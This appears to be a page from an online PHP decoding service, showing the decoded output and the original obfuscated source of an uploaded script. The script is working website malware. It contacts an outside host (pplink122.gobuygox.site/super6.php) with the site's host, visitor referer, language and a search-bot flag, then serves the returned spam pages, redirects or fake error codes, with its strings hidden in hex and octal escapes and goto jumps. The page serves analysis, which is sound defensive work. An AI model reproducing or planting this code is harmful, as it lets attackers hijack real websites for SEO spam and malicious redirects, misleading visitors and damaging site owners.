Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto ZEtc0; yyw3k: $host = $_SERVER["\110\124\124\x50\137\x48\117\123\x54"]; goto Cg0QM; ..

Decoded Output download

<?   goto ZEtc0; yyw3k: $host = $_SERVER["HTTP_HOST"]; goto Cg0QM; KK_up: if (empty($matches)) { $model_file = "index.php"; $model = "index"; } else { $model_file = $matches[1]; $position = strpos($duri, $model_file); if ($position !== false) { $model_file = substr($duri, 0, $position + strlen($model_file)); $model_file = ltrim($model_file, "/"); } $model = str_replace(".php", "", $model_file); } goto biK38; c_QOf: function is_https() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto w18t7; Aw19m: if (is_https()) { $http = "https"; } else { $http = "http"; } goto iQ6_3; q4XCv: $web1 = $http_web . "://" . $goweb . "/super6.php?"; goto NrhIJ; H_vvC: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto KK_up; ItGdR: function disbot() { $user_agent = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($user_agent, "googlebot") || stristr($user_agent, "bing") || stristr($user_agent, "yahoo") || stristr($user_agent, "google") || stristr($user_agent, "Googlebot")) { return 1; } else { return 2; } } goto wRL0u; O7sF6: $string = "@pplink122"; goto aNGpy; wRL0u: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { $duri = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $duri; } goto c_QOf; Cg0QM: $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto haCFE; ZEtc0: $goweb = "pplink122.gobuygox.site"; goto k5tHv; NpyBB: if (!strstr($html_content, "nobotuseragent")) { if (strstr($html_content, "okhtml")) { @header("Content-type: text/html; charset=utf-8"); $html_content = str_replace("okhtml", "", $html_content); echo $html_content; die; } else { if (strstr($html_content, "getcontent500page")) { @header("HTTP/1.1 500 Internal Server Error"); die; } else { if (strstr($html_content, "404page")) { @header("HTTP/1.1 404 Not Found"); die; } else { if (strstr($html_content, "301page")) { @header("HTTP/1.1 301 Moved Permanently"); $html_content = str_replace("301page", "", $html_content); header("Location: " . $html_content); die; } else { if (strstr($html_content, "okxml")) { $html_content = str_replace("okxml", "", $html_content); @header("Content-type: application/xml"); echo $html_content; die; } } } } } } goto ItGdR; OIyHm: $duri = $duri == "" ? "/" : $duri; goto H_vvC; o8jlX: $html_content = request($web); goto NpyBB; k5tHv: $http_web = "https"; goto yyw3k; biK38: if ($duri != "/") { $duri = str_replace("/index.php", "", $duri); $duri = str_replace("/" . $model_file, "", $duri); $duri = str_replace("?", "", $duri); $duri = str_replace("!", "", $duri); $duri = str_replace(".html", "", $duri); } goto O7sF6; D1Ztb: $duri = drequest_uri(); goto OIyHm; KfRr5: $server = detect_server_software(); goto q4XCv; S3RLW: if (isset($_SERVER["HTTP_REFERER"])) { $urlshang = $_SERVER["HTTP_REFERER"]; } goto Aw19m; iQ6_3: $zz = disbot(); goto D1Ztb; w18t7: function detect_server_software() { $path = $_SERVER["DOCUMENT_ROOT"] . "/.htaccess"; if (file_exists($path)) { return 1; } else { return 2; } } goto VH3Z6; haCFE: $urlshang = ""; goto S3RLW; aNGpy: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, "", $duri); } goto KfRr5; NrhIJ: $web = $web1 . "web=" . $host . "&zz=" . $zz . "&uri=" . $duri . "&urlshang=" . $urlshang . "&http=" . $http . "&lang=" . $lang . "&server=" . $server . "&model=" . $model; goto o8jlX; VH3Z6: function request($web) { $response = @file_get_contents($web); if (!$response) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $web); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if (curl_errno($ch)) { echo "cURL Error: " . curl_error($ch); die; } curl_close($ch); } return $response; } ?>

Did this file decode correctly?

Original Code

 goto ZEtc0; yyw3k: $host = $_SERVER["\110\124\124\x50\137\x48\117\123\x54"]; goto Cg0QM; KK_up: if (empty($matches)) { $model_file = "\151\156\x64\145\170\56\x70\150\160"; $model = "\151\156\144\145\x78"; } else { $model_file = $matches[1]; $position = strpos($duri, $model_file); if ($position !== false) { $model_file = substr($duri, 0, $position + strlen($model_file)); $model_file = ltrim($model_file, "\57"); } $model = str_replace("\56\x70\150\160", "", $model_file); } goto biK38; c_QOf: function is_https() { if (isset($_SERVER["\x48\x54\124\x50\123"]) && strtolower($_SERVER["\110\124\124\x50\123"]) !== "\x6f\146\x66") { return true; } elseif (isset($_SERVER["\110\x54\124\120\137\x58\137\106\117\122\x57\101\x52\x44\x45\104\137\x50\x52\117\124\x4f"]) && $_SERVER["\x48\124\x54\x50\x5f\130\137\x46\x4f\122\127\x41\122\x44\105\x44\137\120\122\x4f\124\117"] === "\150\164\x74\x70\163") { return true; } elseif (isset($_SERVER["\x48\x54\x54\120\137\x46\122\x4f\116\124\137\x45\116\x44\137\110\x54\x54\120\123"]) && strtolower($_SERVER["\x48\124\x54\120\x5f\106\x52\117\116\x54\137\x45\x4e\104\x5f\110\x54\124\x50\x53"]) !== "\x6f\x66\x66") { return true; } return false; } goto w18t7; Aw19m: if (is_https()) { $http = "\x68\x74\164\160\x73"; } else { $http = "\x68\x74\164\160"; } goto iQ6_3; q4XCv: $web1 = $http_web . "\x3a\57\57" . $goweb . "\x2f\163\165\160\x65\x72\66\x2e\x70\x68\160\77"; goto NrhIJ; H_vvC: preg_match("\x2f\134\57\50\133\x5e\x5c\x2f\x5d\53\134\56\x70\x68\x70\x29\57", $duri, $matches); goto KK_up; ItGdR: function disbot() { $user_agent = strtolower($_SERVER["\110\x54\124\x50\137\x55\x53\105\x52\137\101\x47\x45\116\124"]); if (stristr($user_agent, "\x67\x6f\157\x67\154\145\x62\157\x74") || stristr($user_agent, "\142\151\x6e\x67") || stristr($user_agent, "\x79\x61\x68\157\x6f") || stristr($user_agent, "\147\x6f\157\147\x6c\145") || stristr($user_agent, "\x47\x6f\157\x67\154\145\142\157\x74")) { return 1; } else { return 2; } } goto wRL0u; O7sF6: $string = "\x40\160\160\x6c\x69\x6e\153\61\62\62"; goto aNGpy; wRL0u: function drequest_uri() { if (isset($_SERVER["\x52\x45\121\125\105\x53\x54\x5f\125\122\111"])) { $duri = $_SERVER["\x52\105\121\125\105\123\124\137\125\x52\x49"]; } else { if (isset($_SERVER["\141\162\147\166"])) { $duri = $_SERVER["\x50\x48\x50\137\123\105\x4c\x46"] . "\x3f" . $_SERVER["\141\162\x67\166"][0]; } else { $duri = $_SERVER["\x50\110\x50\x5f\x53\x45\114\106"] . "\x3f" . $_SERVER["\121\x55\105\x52\131\x5f\x53\124\x52\111\x4e\x47"]; } } return $duri; } goto c_QOf; Cg0QM: $lang = @$_SERVER["\x48\x54\124\120\137\x41\x43\103\105\x50\x54\137\114\x41\x4e\x47\125\x41\x47\105"]; goto haCFE; ZEtc0: $goweb = "\160\160\x6c\151\x6e\x6b\x31\x32\62\x2e\147\x6f\142\x75\x79\147\x6f\x78\56\x73\x69\164\x65"; goto k5tHv; NpyBB: if (!strstr($html_content, "\156\x6f\x62\157\x74\x75\x73\145\162\x61\147\145\x6e\x74")) { if (strstr($html_content, "\157\153\150\x74\x6d\154")) { @header("\x43\x6f\156\164\x65\156\x74\x2d\164\171\x70\x65\x3a\x20\x74\x65\x78\x74\57\150\164\x6d\154\73\x20\x63\150\141\162\163\145\164\75\x75\164\x66\x2d\70"); $html_content = str_replace("\157\x6b\150\164\155\x6c", "", $html_content); echo $html_content; die; } else { if (strstr($html_content, "\x67\145\x74\x63\x6f\x6e\164\145\156\164\x35\60\x30\x70\x61\x67\x65")) { @header("\x48\x54\x54\120\x2f\x31\x2e\61\x20\x35\x30\60\40\111\x6e\x74\x65\162\156\141\154\x20\x53\145\x72\166\x65\162\x20\x45\162\x72\x6f\162"); die; } else { if (strstr($html_content, "\64\60\64\x70\x61\x67\x65")) { @header("\110\x54\124\x50\57\x31\56\61\40\64\x30\x34\x20\x4e\157\164\40\x46\157\165\156\x64"); die; } else { if (strstr($html_content, "\63\x30\x31\160\141\147\x65")) { @header("\110\x54\124\120\57\x31\x2e\x31\x20\x33\x30\x31\40\x4d\157\x76\x65\144\x20\120\145\162\155\x61\156\145\x6e\x74\x6c\x79"); $html_content = str_replace("\x33\60\61\160\141\147\x65", "", $html_content); header("\114\x6f\x63\141\x74\151\157\156\x3a\x20" . $html_content); die; } else { if (strstr($html_content, "\157\153\x78\x6d\154")) { $html_content = str_replace("\157\153\x78\x6d\x6c", "", $html_content); @header("\x43\157\156\x74\x65\x6e\x74\55\x74\171\x70\x65\x3a\x20\141\160\x70\154\151\x63\x61\164\151\x6f\156\57\x78\x6d\x6c"); echo $html_content; die; } } } } } } goto ItGdR; OIyHm: $duri = $duri == "" ? "\x2f" : $duri; goto H_vvC; o8jlX: $html_content = request($web); goto NpyBB; k5tHv: $http_web = "\x68\164\164\x70\163"; goto yyw3k; biK38: if ($duri != "\x2f") { $duri = str_replace("\57\151\156\x64\145\x78\56\x70\150\160", "", $duri); $duri = str_replace("\57" . $model_file, "", $duri); $duri = str_replace("\77", "", $duri); $duri = str_replace("\41", "", $duri); $duri = str_replace("\x2e\150\164\155\x6c", "", $duri); } goto O7sF6; D1Ztb: $duri = drequest_uri(); goto OIyHm; KfRr5: $server = detect_server_software(); goto q4XCv; S3RLW: if (isset($_SERVER["\110\x54\124\120\137\122\105\x46\x45\122\105\x52"])) { $urlshang = $_SERVER["\x48\x54\124\120\137\122\105\x46\105\122\x45\x52"]; } goto Aw19m; iQ6_3: $zz = disbot(); goto D1Ztb; w18t7: function detect_server_software() { $path = $_SERVER["\104\x4f\103\x55\x4d\x45\116\x54\137\x52\117\117\124"] . "\57\56\150\x74\x61\143\143\x65\x73\x73"; if (file_exists($path)) { return 1; } else { return 2; } } goto VH3Z6; haCFE: $urlshang = ""; goto S3RLW; aNGpy: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, "", $duri); } goto KfRr5; NrhIJ: $web = $web1 . "\x77\145\x62\75" . $host . "\x26\172\172\x3d" . $zz . "\46\x75\x72\x69\x3d" . $duri . "\46\165\x72\154\x73\150\141\x6e\147\x3d" . $urlshang . "\46\x68\164\x74\160\x3d" . $http . "\46\x6c\141\156\x67\75" . $lang . "\46\163\145\162\166\x65\162\x3d" . $server . "\46\155\x6f\144\145\x6c\x3d" . $model; goto o8jlX; VH3Z6: function request($web) { $response = @file_get_contents($web); if (!$response) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $web); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if (curl_errno($ch)) { echo "\x63\125\122\114\x20\105\x72\162\x6f\162\x3a\40" . curl_error($ch); die; } curl_close($ch); } return $response; }

Function Calls

None

Variables

None

Stats

MD5 2f9f9ac43293d3f924b05f7f02c94eb5
Eval Count 0
Decode Time 51 ms